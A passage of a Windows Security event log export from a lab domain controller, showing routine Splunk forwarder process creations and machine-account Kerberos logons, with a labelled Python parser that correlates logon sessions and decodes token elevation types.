New Process ID: 0x17fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264502
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x368
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264501
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264503
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x81DF3F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
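Added example (not part of this log export or of Splunk's own tooling): a Python parser for the Splunk WinEventLog export format shown above that pairs 4624 logons with 4634 logoffs by Logon ID, as the 4634 description says can be done, and decodes the raw Token Elevation Type placeholder in 4688 events to the Type 1/2/3 the message text describes. The mapping %%1936 = Type 1 (default), %%1937 = Type 2 (full) and %%1938 = Type 3 (limited) is Windows' own message resource table, not something stated on this page. Body fields are keyed by the section header they fall under, which is what keeps the Subject's Logon ID 0x0 apart from the New Logon's. The embedded sample is a condensed copy of four events from this page; everything else is the example's own.

```python
import re
from datetime import datetime

# Condensed copy of four events from this page (lines not needed here are
# cut). The last two keep the page's order: the 4634 logoff for 0x820FE6
# is exported before its own 4624 logon within the same second.
SAMPLE_LOG = r"""04/19/2021 03:16:11 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
RecordNumber=264499
Subject:
Logon ID: 0x0
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-HOST-797$
Logon ID: 0x81DF3F
Network Information:
Source Network Address: 10.0.1.15
This event is generated when a logon session is created. It is generated on the computer that was accessed.
04/19/2021 03:16:13 PM
EventCode=4688
ComputerName=win-dc-209.attackrange.local
RecordNumber=264500
Creator Subject:
Logon ID: 0x3E7
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:16:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
RecordNumber=264506
Subject:
Logon ID: 0x820FE6
04/19/2021 03:16:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
RecordNumber=264505
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x820FE6
"""

TIMESTAMP = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
HEADER = re.compile(r"^(\w+)=(.*)$")
FIELD = re.compile(r"^([A-Za-z][A-Za-z ()-]*?):\s*(.*)$")
# Resource strings Windows substitutes into 4688 for Default/Full/Limited.
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}

def parse_events(text):
    """Split the export into events; body fields are keyed 'Section/Name'.
    Lines that are neither header nor field (Microsoft's explanatory text)
    are skipped."""
    events, section = [], ""
    for line in map(str.strip, text.splitlines()):
        if TIMESTAMP.match(line):
            events.append({"time": datetime.strptime(line, "%m/%d/%Y %I:%M:%S %p"), "fields": {}})
            section = ""
        elif not events:
            continue
        elif m := HEADER.match(line):
            events[-1][m.group(1)] = m.group(2)
        elif m := FIELD.match(line):
            name, value = m.groups()
            if value:
                events[-1]["fields"][f"{section}/{name}" if section else name] = value
            else:  # a bare 'Subject:' style line opens a new section
                section = name
    return events

def correlate_sessions(events):
    """Pair 4624 (New Logon/Logon ID) with 4634 (Subject/Logon ID) per host;
    Logon IDs are unique only between reboots of one host, so a long-running
    pipeline should also flush this table on a reboot."""
    sessions = {}
    # RecordNumber, not file position or timestamp, gives generation order.
    for ev in sorted(events, key=lambda e: int(e.get("RecordNumber", 0))):
        f, host = ev["fields"], ev.get("ComputerName")
        if ev.get("EventCode") == "4624":
            sessions[(host, f["New Logon/Logon ID"])] = {
                "account": f["New Logon/Account Name"],
                "logon_type": f["Logon Information/Logon Type"],
                "source": f.get("Network Information/Source Network Address", "-"),
                "logon_at": ev["time"], "logoff_at": None, "duration_s": None}
        elif ev.get("EventCode") == "4634":
            s = sessions.get((host, f["Subject/Logon ID"]))
            if s:  # a logoff whose logon predates the capture window is dropped
                s["logoff_at"] = ev["time"]
                s["duration_s"] = int((ev["time"] - s["logon_at"]).total_seconds())
    return sessions

def process_creations(events):
    """Summarise 4688 events, decoding Token Elevation Type to Type 1/2/3."""
    return [{"process": ev["fields"]["Process Information/New Process Name"],
             "cmdline": ev["fields"]["Process Information/Process Command Line"],
             "creator_logon_id": ev["fields"]["Creator Subject/Logon ID"],
             "token_type": TOKEN_ELEVATION.get(ev["fields"]["Process Information/Token Elevation Type"])}
            for ev in events if ev.get("EventCode") == "4688"]
```

Two caveats that this export itself shows. Events within the same second are listed in descending RecordNumber order (the 4634 for 0x81C509 with RecordNumber 264494 precedes its 4624 with RecordNumber 264493 above), so the correlator sorts by RecordNumber instead of trusting file order; processed in file order, that logoff would arrive before its logon and be dropped. And, as the 4634 text says, Logon IDs are only unique between reboots on one computer, so the session key includes ComputerName. Run it over a full export with parse_events(open(path).read()); the 4688 summary shows every Splunk helper here started by splunkd.exe under the SYSTEM logon 0x3E7 with a Type 1 token, which is what the Type 1 description predicts for a service account.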
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264506
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x820FE6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264505
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x820FE6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62712
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264504
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x820FE6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264507
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1904
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264508
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1390
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264509
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264510
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:17:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264511
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x444
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264513
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264512
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264519
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264518
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x823F9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62720
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264517
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264516
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F31
Logon Type: 3
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264515
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x823F31
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62719
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:17:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264514
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x823F31
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264522
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x824C57
Logon Type: 3
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264521
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x824C57
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62728
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264520
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x824C57
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264524
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264523
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xffc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
